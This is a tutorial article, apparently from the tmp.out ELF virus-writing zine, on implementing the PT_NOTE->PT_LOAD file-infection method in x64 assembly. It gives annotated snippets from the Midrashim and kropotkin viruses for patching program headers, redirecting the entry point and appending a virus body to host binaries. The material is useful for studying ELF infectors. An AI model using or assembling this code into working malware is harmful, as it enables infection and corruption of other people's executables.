┌───────────────────────┐
                                                            ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄       │
                                                            │ █   █ █ █ █   █       │
                                                            │ █   █ █ █ █▀▀▀▀       │
                                                            │ █   █   █ █     ▄     │
                                                            │                 ▄▄▄▄▄ │
                                                            │                 █   █ │
                                                            │                 █   █ │
                                                            │                 █▄▄▄█ │
                                                            │                 ▄   ▄ │
                                                            │                 █   █ │
                                                            │                 █   █ │
                                                            │                 █▄▄▄█ │
                                                            │                 ▄▄▄▄▄ │
                                                            │                   █   │
Implementing the PT_NOTE Infection Method in x64 Assembly   │                   █   │
~ sblip and the tmp.out crew                                └───────────────────█ ──┘

In this first issue of tmp.out, we have supplied several examples of the
PT_NOTE->PT_LOAD infection algorithm, three in x64 asm and one in Rust. 
For those learning the craft I thought it useful to address implementing some of the 
specific steps in x64 assembly. In March 2019 while working on a golang rewrite of 
the backdoorfactory, I wrote a breakdown of implementing the algorithm in golang at 
the link below, for those interested in doing fun ELF things in golang:

  https://www.symbolcrash.com/2019/03/27/pt_note-to-pt_load-injection-in-elf/

The algorithm for x64 is of course the same, however I will provide some code 
snippets below that I hope will be of help for the aspiring x64 assembly ELF 
programmer. 

We can use the same steps listed in the above article as a reference, though the
order things are done in may change based on the implementation. Some methods write 
a new file to disk and then copy over it, while others write to the file directly.

From the above link, a generic list of steps to implement the PT_NOTE->PT_LOAD 
infection algorithm:

  1. Open the ELF file to be injected
  2. Save the original entry point, e_entry
  3. Parse the program header table, looking for a PT_NOTE segment
  4. Convert the PT_NOTE segment to a PT_LOAD segment
  5. Change the memory protections for this segment to allow executable instructions
  6. Change the entry point address to an area that will not conflict with the 
     original program execution.
  7. Adjust the size on disk and virtual memory size to account for the size of the 
     injected code
  8. Point the offset of our converted segment to the end of the original binary, 
     where we will store the new code
  9. Patch the end of the code with instructions to jump to the original entry point
 10. Add our injected code to the end of the file
*11. Write the file back to disk, over the original file* -- we will not cover this 
     implementation variant here, which creates	a new temporary ELF binary on disk 
     and overwrites the host, as referenced above.

We will loosely follow the above steps, however the reader should keep in mind that 
some of them may be performed out of order (and some cannot be performed until others
have) - but in the end all the steps must be taken.

1. Open the ELF file to be injected:

The syscall getdents64() syscall is how we find files on 64 bit systems. The function
is defined as:

  int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

We will leave implementing getdents64() as an exercise for the reader - There are 
several examples of it in the code distributed with this publication, including in 
Midrashim, kropotkin, Eng3ls, and Bak0unin.

For the ELF historians, I wrote a terrible (and now entirely outdated) article 20 
years ago about doing this in 32-bit AT&T syntax, located here:

  https://tmpout.sh/papers/getdents.old.att.syntax.txt

Assuming we have called getdents64() and stored the directory entry struct on the 
stack, we can see from looking at it:

  struct linux_dirent {
      unsigned long  d_ino;     /* Inode number */
      unsigned long  d_off;     /* Offset to next linux_dirent */
      unsigned short d_reclen;  /* Length of this linux_dirent */
      char           d_name[];  /* Filename (null-terminated) */
                        /* length is actually (d_reclen - 2 -
                           offsetof(struct linux_dirent, d_name)) */
      /*
      char           pad;       // Zero padding byte
      char           d_type;    // File type (only since Linux
                                // 2.6.4); offset is (d_reclen - 1)
      */
  }

that the null terminated file name d_name is at the offset [rsp+18] or [rsp+0x12]

  d_ino is bytes 0-7              - unsigned long
  d_off is bytes 8-15             - unsigned long
  d_reclen is bytes 16-17         - unsigned short
  d_name starts on the 18th byte. - null terminated file name

for our call to open(), int open(const char *pathname, int flags, mode_t mode);

  - rax will hold the syscall number, 2
  - rdi will hold the file name d_name, in our case [rsp+18]
  - rsi will hold the flags, which could either be O_RDONLY (0) or O_RDWR (02), 
    depending on how our vx works
  - rdx would hold the mode, but we do not need this and will zero it out.

So the following code:

  mov rax, 2         ; open syscall
  mov rdi, [rsp+18]  ; d_name from the dirent struct that starts at the beginning 
                     ; of the stack
  mov rsi, 2         ; O_RDWR / Read and Write
  syscall

will return a file descriptor in rax if successful. If 0 or negative, an error has
occurred opening the file.

  cmp rax, 0
  jng file_open_error

or
  test rax, rax
  js file_open_error

2. Save the original entry point, e_entry:

In TMZ's Midrashim, he stores the original entry point in the r14 register for later
use, which he has copied onto the stack. The high registers r13, r14, and r15 are 
good places to store data/addresses for later use, as they are not clobbered by 
syscalls.

  ; Stack buffer:
  ; r15 + 0 = stack buffer (10000 bytes) = stat
  ; r15 + 48 = stat.st_size
  ; r15 + 144 = ehdr
  ; r15 + 148 = ehdr.class
  ; r15 + 152 = ehdr.pad
  ; r15 + 168 = ehdr.entry
  ---cut---
  
  mov r14, [r15 + 168]  ; storing target original ehdr.entry from [r15 + 168] in r14

3. Parse the program header table, looking for the PT_NOTE segment:

As you probably intuited from the name of this article, our goal is to convert a 
PT_NOTE segment into a loadable PT_LOAD segment, with rx (or rwx) permissions.
I would be remiss not to mention that this algorithm does not work 
"cookie-cutter-out-of-the box" for some binaries such as golang binaries, and any
binaries compiled with the -fcf-protection flag, without even more magical fuckery
that we haven't done (or seen) yet. Next zine content, Every0ne? 

Aside from the edge cases, the basic concept is simple - PT_LOAD segments are 
actually loaded into memory when an ELF binary is run - PT_NOTE segments are not.
However, if we change a PT_NOTE section to type PT_LOAD, and change the memory 
permissions to at least read and execute, we can put code that WE want to run there,
write our data to the end of the original file, and change the associated Program 
Header Table entry variables to facilitate loading it correctly.

We put a value in the virtual address field v_addr that is very high in memory, which
won't interfere with normal program execution. We then patch the original entry point
to jump to our new PT_LOAD segment code first, which does whatever it does, and then 
calls the original program code.

A 64-bit ELF Program Header Table entry has the following structure:

  typedef struct {
      uint32_t   p_type;   // 4 bytes
      uint32_t   p_flags;  // 4 bytes
      Elf64_Off  p_offset; // 8 bytes
      Elf64_Addr p_vaddr;  // 8 bytes
      Elf64_Addr p_paddr;  // 8 bytes
      uint64_t   p_filesz; // 8 bytes
      uint64_t   p_memsz;  // 8 bytes
      uint64_t   p_align;  // 8 bytes
  } Elf64_Phdr;


In this code snippet from kropotkin.s, we cycle through each program header table 
entry by loading the offset of the PHT into rbx, the number of PHT entries into ecx,
and reading the first 4 bytes at the beginning of the entry looking for a value of 4,
which is the number designated for segments of type PT_NOTE.  

parse_phdr:
  xor rcx, rcx                       ; zero out rcx
  xor rdx, rdx                       ; zero out rdx
  mov cx, word [rax+e_hdr.phnum]     ; rcx contains the number of entries in the PHT
  mov rbx, qword [rax+e_hdr.phoff]   ; rbx contains the offset of the PHT
  mov dx, word [rax+e_hdr.phentsize] ; rdx contains the size of an entry in the PHT

  loop_phdr:
      add rbx, rdx                   ; for every iteration, add size of a PHT entry
      dec rcx                        ; decrease phnum until we've iterated through 
                                     ; all program headers or found a PT_NOTE segment
      cmp dword [rax+rbx+e_phdr.type], 0x4  ; if 4, we have found a PT_NOTE segment,
                                            ; and head off to infect it
      je pt_note_found
      cmp rcx, 0
      jg loop_phdr
      ...
      ...
  pt_note_found:

4. Convert the PT_NOTE segment to a PT_LOAD segment:

To convert a PT_NOTE segment into a PT_LOAD segment, we must change a few values in
the Program Header Table entry that describes the segment.

Note that 32-bit ELF binaries have a different PHT entry structure, with the p_flags
value as the 7th entry in the struct, as opposed to being the 2nd entry in its 64-bit
counterpart.

  typedef struct {
      uint32_t   p_type;  <-- Change this value to PT_LOAD == 1
      uint32_t   p_flags; <-- Change to at least Read+Execute permissions
      Elf64_Off  p_offset;
      Elf64_Addr p_vaddr; <-- very high virtual addr where the segment will be loaded
      Elf64_Addr p_paddr;
      uint64_t   p_filesz;
      uint64_t   p_memsz;
      uint64_t   p_align;
  } Elf64_Phdr;

First, the p_type must be changed from PT_NOTE, which is 4, to PT_LOAD, which is 1.

Second, the p_flags must be changed to, at the very least, allow Read and Execute 
access. This is a standard bitmask just like unix file permissions, with

  PF_X == 1
  PF_W == 2
  PF_R == 4

In fasm syntax, as seen below, this is done simply by typing "PF_R or PF_X"

Third, we need to choose an address for the new virus data to be loaded. A common 
technique is to pick a very high address, 0xc000000, that is unlikely to overlap 
with an existing segment. We add this to the stat.st_size file size, which in the
below case has been retrieved from r15+48 and stored in r13, to which we then add
0xc000000. We then store this value in p_vaddr.

From TMZ's Midrashim:

  .patch_phdr:
    mov dword [r15 + 208], PT_LOAD              ; change phdr type in [r15 + 208] 
                                                ;  from PT_NOTE to PT_LOAD (1)
    mov dword [r15 + 212], PF_R or PF_X         ; change phdr.flags in [r15 + 212] 
                                                ;  to PF_X (1) | PF_R (4)
    pop rax                                     ; restore target EOF offset into rax
    mov [r15 + 216], rax                        ; phdr.offset [r15 + 216] = target 
                                                ;  EOF offset
    mov r13, [r15 + 48]                         ; storing target stat.st_size from 
                                                ;  [r15 + 48] in r13
    add r13, 0xc000000                          ; add 0xc000000 to target file size
    mov [r15 + 224], r13                        ; changing phdr.vaddr in [r15 + 224]
                                                ;  to new one in r13 
                                                ;  (stat.st_size + 0xc000000)
    mov qword [r15 + 256], 0x200000             ; set phdr.align [r15 + 256] to 2mb
    add qword [r15 + 240], v_stop - v_start + 5 ; add virus size to phdr.filesz in 
                                                ;  [r15 + 240] + 5 for the jmp to 
                                                ;  original ehdr.entry
    add qword [r15 + 248], v_stop - v_start + 5 ; add virus size to phdr.memsz in 
                                                ;  [r15 + 248] + 5 for the jmp to 
                                                ;  original ehdr.entry

5. Change the memory protections for this segment to allow executable instructions:

    mov dword [r15 + 212], PF_R or PF_X         ; change phdr.flags in [r15 + 212] 
                                                ;  to PF_X (1) | PF_R (4)

6. Change the entry point address to an area that will not conflict with the original
   program execution. We'll use 0xc000000. Pick an address that will be sufficiently
   high enough in virtual memory that when loaded it does not overlap other code.

    mov r13, [r15 + 48]     ; storing target stat.st_size from [r15 + 48] in r13
    add r13, 0xc000000      ; adding 0xc000000 to target file size
    mov [r15 + 224], r13    ; changing phdr.vaddr in [r15 + 224] to new one in r13 
                            ;  (stat.st_size + 0xc000000)

7. Adjust the size on disk and virtual memory size to account for the size of the 
   injected code

    add qword [r15 + 240], v_stop - v_start + 5  ; add virus size to phdr.filesz in
                                                 ;  [r15 + 240] + 5 for the jmp to 
                                                 ;  original ehdr.entry
    add qword [r15 + 248], v_stop - v_start + 5  ; add virus size to phdr.memsz in
                                                 ;  [r15 + 248] + 5 for the jmp to
                                                 ;  original ehdr.entry

8. Point the offset of our converted segment to the end of the original binary, 
   where we will store the new code:

   Previously in Midrashim, this code was executed:
    
    mov rdx, SEEK_END
    mov rax, SYS_LSEEK
    syscall                ; getting target EOF offset in rax
    push rax               ; saving target EOF

   In .patch_phdr, we use this value as the location for storing our new code:

    pop rax                ; restoring target EOF offset into rax
    mov [r15 + 216], rax   ; phdr.offset [r15 + 216] = target EOF offset


9. Patch the end of the code with instructions to jump to the original entry point:

   Example #1, from Midrashim, using algorithm from Binjection:

    .write_patched_jmp:
      ; getting target new EOF
      mov rdi, r9            ; r9 contains fd
      mov rsi, 0             ; seek offset 0
      mov rdx, SEEK_END      ; start at the end of the file
      mov rax, SYS_LSEEK     ; lseek syscall
      syscall                ; getting target EOF offset in rax

      ; creating patched jmp
      mov rdx, [r15 + 224]         ; rdx = phdr.vaddr
      add rdx, 5                   ; the size of a jmp instruction
      sub r14, rdx                 ; subtract the size of the jump from our stored
                                   ;  e_entry from step #2 (saving e_entry)
      sub r14, v_stop - v_start    ; subtract the size of the virus code itself
      mov byte [r15 + 300 ], 0xe9  ; first byte of the jump instructions
      mov dword [r15 + 301], r14d  ; new address to jump to, updated by subtracting
                                 ;  virus size and size of jmp instruction

   Example #2, from sblip/s01den vx's, using elfmaster's OEP technique:

    Explaining this method is beyond the scope of this document - for reference:

      https://tmpout.sh/1/11.html

   The code from kropotkin.s:
   
       mov rcx, r15                    ; saved rsp
       add rcx, VXSIZE
       mov dword [rcx], 0xffffeee8     ; relative call to get_eip
       mov dword [rcx+4], 0x0d2d48ff   ; sub rax, (VXSIZE+5)
       mov byte  [rcx+8], 0x00000005 
       mov word  [rcx+11], 0x0002d48
       mov qword [rcx+13], r9          ; sub rax, entry0  
       mov word  [rcx+17], 0x0000548
       mov qword [rcx+19], r12         ; add rax, sym._start
       mov dword [rcx+23], 0xfff4894c  ; movabs rsp, r14
       mov word  [rcx+27], 0x00e0      ; jmp rax

10. Add our injected code to the end of the file:

From Midrashim:

  We are adding our code directly to the end of the file, and pointing the new 
  PT_LOAD address at it.  First we seek to the end of the file using the lseek
  syscall to go to the end of the file whose file descriptor is held in the 
  register r9. Calling .delta pushes the address of the next instruction on to
  the top of the stack, in this case 'pop rbp'. Popping this instruction and 
  then subtracting .delta will give you the memory address of the virus during 
  runtime, which is used when reading/copying the virus code below where you 
  see 'lea rsi, [rbp + v_start]' - providing a starting location for reading 
  bytes to be written, with the number of bytes to be written is put in rdx 
  before the call to pwrite64().

  .append_virus:
    ; getting target EOF
    mov rdi, r9               ; r9 contains fd
    mov rsi, 0                ; seek offset 0
    mov rdx, SEEK_END         ; start at the end of the file
    mov rax, SYS_LSEEK        ; lseek syscall
    syscall                   ; getting target EOF offset in rax
    push rax                  ; saving target EOF

    call .delta               ; the age old trick
    .delta:
        pop rbp
        sub rbp, .delta

    ; writing virus body to EOF
    mov rdi, r9               ; r9 contains fd
    lea rsi, [rbp + v_start]  ; loading v_start address in rsi
    mov rdx, v_stop - v_start ; virus size
    mov r10, rax              ; rax contains target EOF offset from previous syscall
    mov rax, SYS_PWRITE64     ; syscall #18, pwrite()
    syscall

The PT_NOTE infection algorithm has the benefit of being fairly easy to learn, as
well as being very versatile. It can be combined with other techniques and any manner
of data may be stored in a converted PT_LOAD segment, including symbol tables, raw 
data, code for a DT_NEEDED object, or even an entirely separate ELF binary. I hope 
this article proves useful to anyone learning x64 assembly language for the purposes
of playing with ELF binaries.